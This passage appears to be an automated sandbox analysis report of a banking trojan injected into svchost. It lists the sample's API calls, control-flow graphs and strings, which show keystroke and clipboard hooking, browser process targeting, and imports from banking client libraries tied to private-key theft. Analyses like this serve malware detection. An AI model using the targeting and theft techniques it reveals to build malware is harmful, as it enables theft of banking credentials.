                                                                                                                                                                                                                • Part of subcall function 02CA5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02CA57E9
                                                                                                                                                                                                                • Part of subcall function 02CA5720: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02CA57FB
                                                                                                                                                                                                                • Part of subcall function 02CA5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02CA581A
                                                                                                                                                                                                                • Part of subcall function 02CA5720: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02CA5828
                                                                                                                                                                                                                • Part of subcall function 02CA5720: GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02CA5844
                                                                                                                                                                                                                • Part of subcall function 02CA5720: GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02CA5860
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB19A0,00000000,00000000,00000000), ref: 02CA7549
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA755D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA756A
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB1C80,00000000,00000000,00000000), ref: 02CA757F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7593
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA75A0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02C980C0,00000000,00000000,00000000), ref: 02CA75B5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA75CD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA75E6
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\isclient.exe), ref: 02CA75FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 02CA7613
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\intpro.exe), ref: 02CA7625
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 02CA7637
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\clmain.exe), ref: 02CA7649
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\core.exe), ref: 02CA765B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 02CA766D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\notepad.exe), ref: 02CA767F
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 02CA76EC
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02CA76FB
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02CA7714
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 02CA771B
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,5dd2ba1da), ref: 02CA7731
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02C9BC50,00000000,00000000,00000000), ref: 02CA7745
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA775D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA776E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00007FD0,00000000,00000000,00000000), ref: 02CA7783
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA779B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA77AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Create$Thread$Information$Close$Security$Descriptor$AddressProc$HeapProcess$CriticalCurrentFreeInitializeModuleMutexPathSectionUser$AdminBackslashCommandConvertFileInfoLibraryLineLoadLocalNameNamedSaclStringVolume_snprintfmemset$DesktopDirectoryEnvironmentExceptionFolderHandlerMultipleObjectObjectsOpenQuerySleepSystemValidateValueVariableVectoredWaitWindowslstrcmpi
                                                                                                                                                                                                              • String ID: --no-sandbox$ --no-sandbox$5DD2BD1Da$5DD2BE51a$5dd2ba1da$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$S:(ML;;NRNWNX;;;LW)$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\frd.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll
                                                                                                                                                                                                              • API String ID: 3526539773-3150608569
                                                                                                                                                                                                              • Opcode ID: 40f18516eb261fb75f66f3ea2cc720a8777e741d9dbe90f740d2ea336b616fc5
                                                                                                                                                                                                              • Instruction ID: e74f17cf6aaaee0326dd12880f381208eb2052b2b36fc818ac0ea366ec45bc62
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40f18516eb261fb75f66f3ea2cc720a8777e741d9dbe90f740d2ea336b616fc5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB62AB31E8231AB6FB2097A48D5AFEEB7AC6F44B48F544554FA05F60C0DBB0D7058BA4
                                                                                                                                                                                                              Function 02CA5720 Relevance: 114.1, APIs: 43, Strings: 22, Instructions: 302libraryloaderthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 216 2ca5720-2ca57a3 memset GetModuleFileNameA AddVectoredExceptionHandler CreateMutexA CreateThread 217 2ca57c8-2ca57f3 InitializeCriticalSection call 2ca2570 LoadLibraryExA 216->217 218 2ca57a5-2ca57b9 GetHandleInformation 216->218 223 2ca5811-2ca5820 LoadLibraryExA 217->223 224 2ca57f5-2ca57ff GetProcAddress 217->224 218->217 219 2ca57bb-2ca57bf 218->219 219->217 221 2ca57c1-2ca57c2 CloseHandle 219->221 221->217 225 2ca5822-2ca582c GetProcAddress 223->225 226 2ca5876-2ca588a InitializeCriticalSection GetModuleHandleA 223->226 224->223 227 2ca5801-2ca580c call 2caa540 224->227 225->226 228 2ca582e-2ca5848 call 2caa540 GetProcAddress 225->228 229 2ca58a8-2ca58c1 GetCurrentProcessId call 2cb4880 226->229 230 2ca588c-2ca5896 GetProcAddress 226->230 227->223 228->226 240 2ca584a-2ca5864 call 2caa540 GetProcAddress 228->240 238 2ca5902-2ca5913 LoadLibraryExA 229->238 239 2ca58c3-2ca58e3 GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 229->239 230->229 233 2ca5898-2ca58a3 call 2caa540 230->233 233->229 243 2ca5931-2ca5937 GetCurrentProcessId call 2cb4880 238->243 244 2ca5915-2ca591f GetProcAddress 238->244 239->238 241 2ca58e5-2ca58f9 lstrcmpiA 239->241 240->226 250 2ca5866-2ca5871 call 2caa540 240->250 241->238 245 2ca58fb-2ca5900 call 2c98560 241->245 252 2ca593c-2ca593e 243->252 244->243 247 2ca5921-2ca592c call 2caa540 244->247 245->243 247->243 250->226 255 2ca597c-2ca5980 252->255 256 2ca5940-2ca5960 GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 252->256 258 2ca5986-2ca59a6 call 2ca9820 call 2c91660 StrStrIA 255->258 259 2ca5ae7-2ca5aed 255->259 256->255 257 2ca5962-2ca5976 lstrcmpiA 256->257 257->255 257->259 264 2ca59a8-2ca59b8 StrStrIA 258->264 265 2ca59be-2ca59ce StrStrIA 258->265 264->259 264->265 265->259 266 2ca59d4-2ca59e7 LoadLibraryExA 265->266 267 2ca59e9-2ca59f3 GetProcAddress 266->267 268 2ca5a3d-2ca5a73 InitializeCriticalSection call 2ca1900 call 2ca1190 call 2c9ff90 LoadLibraryExA 266->268 270 2ca5a05-2ca5a0f GetProcAddress 267->270 271 2ca59f5-2ca5a00 call 2caa540 267->271 283 2ca5a91-2ca5a9e LoadLibraryExA 268->283 284 2ca5a75-2ca5a7f GetProcAddress 268->284 274 2ca5a21-2ca5a2b GetProcAddress 270->274 275 2ca5a11-2ca5a1c call 2caa540 270->275 271->270 274->268 278 2ca5a2d-2ca5a38 call 2caa540 274->278 275->274 278->268 286 2ca5abc-2ca5ac9 LoadLibraryExA 283->286 287 2ca5aa0-2ca5aaa GetProcAddress 283->287 284->283 285 2ca5a81-2ca5a8c call 2caa540 284->285 285->283 286->259 290 2ca5acb-2ca5ad5 GetProcAddress 286->290 287->286 289 2ca5aac-2ca5ab7 call 2caa540 287->289 289->286 290->259 291 2ca5ad7-2ca5ae2 call 2caa540 290->291 291->259
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA5741
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,74DEF550,75B07390,74DF0A60), ref: 02CA5757
                                                                                                                                                                                                              • AddVectoredExceptionHandler.KERNEL32(00000001,02C93A20), ref: 02CA5764
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02CA577F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02CA5799
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA57B1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA57C2
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(02CDFB50), ref: 02CA57D3
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02CA57E9
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02CA57FB
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02CA581A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02CA5828
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02CA5844
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02CA5860
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(02CDFB38), ref: 02CA587B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02CA5882
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02CA5892
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,02C979E0,02CE9E88), ref: 02CA58A8
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02CA58C3
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02CA58D8
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 02CA58DF
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,5dd2ba1da), ref: 02CA58F1
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02CA590B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 02CA591B
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,02C9BB50,02CDEB74), ref: 02CA5931
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02CA5940
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02CA5955
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 02CA595C
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,5dd2ba1da), ref: 02CA596E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,java), ref: 02CA59A2
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.exe), ref: 02CA59B4
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,frd.exe), ref: 02CA59CA
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02CA59E1
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02CA59EF
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02CA5A0B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02CA5A27
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(02CDFB20), ref: 02CA5A42
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02CA5A6F
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02CA5A7B
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02CA5A9A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02CA5AA6
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02CA5AC5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02CA5AD1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
                                                                                                                                                                                                              • String ID: .exe$5dd2ba1da$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$frd.exe$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
                                                                                                                                                                                                              • API String ID: 1248150503-2694324294
                                                                                                                                                                                                              • Opcode ID: f5c947223c08e366acc08c17b10607a7ab689175f618067beeadaefda72ac36d
                                                                                                                                                                                                              • Instruction ID: ec59e646e53332d8bfb36d84b8d6b28dbfe4899a75ef65ba175ac34556f8edbe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5c947223c08e366acc08c17b10607a7ab689175f618067beeadaefda72ac36d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C919371FC13167AFA2066B15C66F6A276C6F44FC8F944524B607F6080DBA4EA04DAB8
                                                                                                                                                                                                              Function 02CA4AB0 Relevance: 100.2, APIs: 48, Strings: 9, Instructions: 421memorynetworkfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 294 2ca4ab0-2ca4afd memset 295 2ca4b03-2ca4b06 294->295 296 2ca4f75-2ca4f7d 294->296 295->296 297 2ca4b0c-2ca4b0f 295->297 298 2ca4bb0-2ca4bcd InternetOpenA 297->298 299 2ca4b15-2ca4b1c 297->299 302 2ca4f1a 298->302 303 2ca4bd3-2ca4bec InternetConnectA 298->303 300 2ca4b49-2ca4b4e 299->300 301 2ca4b1e-2ca4b38 GetProcessHeap HeapAlloc 299->301 300->296 308 2ca4b54-2ca4b6f memcpy 300->308 306 2ca4b3a-2ca4b43 memset 301->306 307 2ca4b46 301->307 305 2ca4f20-2ca4f25 302->305 303->302 304 2ca4bf2-2ca4bfc 303->304 309 2ca4bfe 304->309 310 2ca4c03-2ca4c24 HttpOpenRequestA 304->310 311 2ca4f43-2ca4f4d 305->311 312 2ca4f27-2ca4f35 GetProcessHeap HeapValidate 305->312 306->307 307->300 313 2ca4b70-2ca4b7e 308->313 309->310 310->302 314 2ca4c2a-2ca4c33 310->314 316 2ca4f4f-2ca4f53 InternetCloseHandle 311->316 317 2ca4f55-2ca4f5a 311->317 312->311 315 2ca4f37-2ca4f3d GetProcessHeap HeapFree 312->315 313->313 318 2ca4b80 313->318 319 2ca4c4e 314->319 320 2ca4c35-2ca4c39 314->320 315->311 316->317 321 2ca4f5f-2ca4f64 317->321 322 2ca4f5c-2ca4f5d InternetCloseHandle 317->322 323 2ca4b82-2ca4b93 318->323 325 2ca4c51-2ca4c64 HttpAddRequestHeadersA 319->325 320->319 324 2ca4c3b-2ca4c4c HttpAddRequestHeadersA 320->324 326 2ca4f69-2ca4f72 321->326 327 2ca4f66-2ca4f67 InternetCloseHandle 321->327 322->321 328 2ca4b97-2ca4b9e 323->328 329 2ca4b95 323->329 324->325 330 2ca4c96-2ca4c9b 325->330 331 2ca4c66-2ca4c94 _snprintf HttpAddRequestHeadersA 325->331 327->326 328->323 332 2ca4ba0-2ca4bab call 2ca8160 328->332 329->328 333 2ca4c9d 330->333 334 2ca4ca0-2ca4cb2 HttpSendRequestA 330->334 331->330 332->298 333->334 334->302 336 2ca4cb8-2ca4cd5 HttpQueryInfoA 334->336 336->302 337 2ca4cdb-2ca4ce2 336->337 337->302 338 2ca4ce8-2ca4d10 CreateFileA 337->338 338->302 339 2ca4d16-2ca4d1d call 2cb5930 338->339 342 2ca4d1f-2ca4d34 ConvertStringSecurityDescriptorToSecurityDescriptorW 339->342 343 2ca4d76-2ca4d90 GetProcessHeap RtlAllocateHeap 339->343 342->343 344 2ca4d36-2ca4d55 GetSecurityDescriptorSacl 342->344 345 2ca4e5a-2ca4e5c 343->345 346 2ca4d96-2ca4dc3 memset InternetReadFile 343->346 347 2ca4d6c-2ca4d70 LocalFree 344->347 348 2ca4d57-2ca4d66 SetNamedSecurityInfoA 344->348 351 2ca4e5e-2ca4e72 GetHandleInformation 345->351 352 2ca4e81-2ca4e95 call 2c974a0 345->352 349 2ca4e3e-2ca4e4c GetProcessHeap HeapValidate 346->349 350 2ca4dc5-2ca4dca 346->350 347->343 348->347 349->345 355 2ca4e4e-2ca4e54 GetProcessHeap HeapFree 349->355 350->349 354 2ca4dcc-2ca4e23 SetFilePointer LockFile WriteFile UnlockFile GetProcessHeap HeapValidate 350->354 351->352 356 2ca4e74-2ca4e78 351->356 352->305 360 2ca4e9b-2ca4ea5 352->360 354->343 359 2ca4e29-2ca4e39 GetProcessHeap HeapFree 354->359 355->345 356->352 357 2ca4e7a-2ca4e7b CloseHandle 356->357 357->352 359->343 361 2ca4eb0-2ca4ebe 360->361 361->361 362 2ca4ec0 361->362 363 2ca4ec2-2ca4ed3 362->363 364 2ca4ed7-2ca4ede 363->364 365 2ca4ed5 363->365 364->363 366 2ca4ee0-2ca4ef7 call 2ca8160 call 2c97350 364->366 365->364 370 2ca4efc-2ca4f0a GetProcessHeap HeapValidate 366->370 370->305 371 2ca4f0c-2ca4f18 GetProcessHeap HeapFree 370->371 371->305
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4AED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02CA4B27
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02CA4B2E
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4B3E
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CA4B5D
                                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02CA4BC2
                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02CA4BE1
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02CA4C19
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02CA4C4A
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02CA4C5E
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CA4C7C
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02CA4C94
                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02CA4CAA
                                                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02CA4CCD
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02CA4D05
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02CA4D2C
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,00000004,00000000,?,?,00000000), ref: 02CA4D4D
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02CA4D66
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 02CA4D70
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001010,?,?,00000000), ref: 02CA4D83
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,00000000), ref: 02CA4D86
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4D9E
                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02CA4DBB
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 02CA4DDC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02CA4DEC
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02CA4DFB
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02CA4E0B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02CA4E14
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02CA4E1B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02CA4E2C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02CA4E33
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02CA4E41
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02CA4E44
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02CA4E51
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02CA4E54
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000004,?,?,00000000), ref: 02CA4E6A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 02CA4E7B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • GET, xrefs: 02CA4BF5
                                                                                                                                                                                                              • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02CA4C6B
                                                                                                                                                                                                              • S:(ML;;NRNWNX;;;LW), xrefs: 02CA4D27
                                                                                                                                                                                                              • 61de29337166780, xrefs: 02CA4C66
                                                                                                                                                                                                              • HTTP/1.0, xrefs: 02CA4C11
                                                                                                                                                                                                              • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02CA4BBD
                                                                                                                                                                                                              • Content-Type: application/x-www-form-urlencoded, xrefs: 02CA4C42
                                                                                                                                                                                                              • POST, xrefs: 02CA4BFE, 02CA4C17
                                                                                                                                                                                                              • Referer: http://www.google.com, xrefs: 02CA4C58
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FileHttpProcess$Request$Security$DescriptorFreeHeadersInternetmemset$HandleInfoOpenValidate$AllocAllocateCloseConnectConvertCreateInformationLocalLockNamedPointerQueryReadSaclSendStringUnlockWrite_snprintfmemcpy
                                                                                                                                                                                                              • String ID: 61de29337166780$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1986934500-1153629099
                                                                                                                                                                                                              • Opcode ID: efe555c094c05036a289af937411a891a57968364d6a3d97c7f2f0aa353ceac2
                                                                                                                                                                                                              • Instruction ID: 00be33bdf92c910a0350cacc8c282c741eab2a21905d980f754226bc373ecd2b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: efe555c094c05036a289af937411a891a57968364d6a3d97c7f2f0aa353ceac2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20D1D171A41216ABEB249FA4CC59FDF7B6CEF48758F504614FA05E7180DBB0EA00CBA4
                                                                                                                                                                                                              Function 00402D30 Relevance: 64.9, APIs: 28, Strings: 9, Instructions: 157librarywindowCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
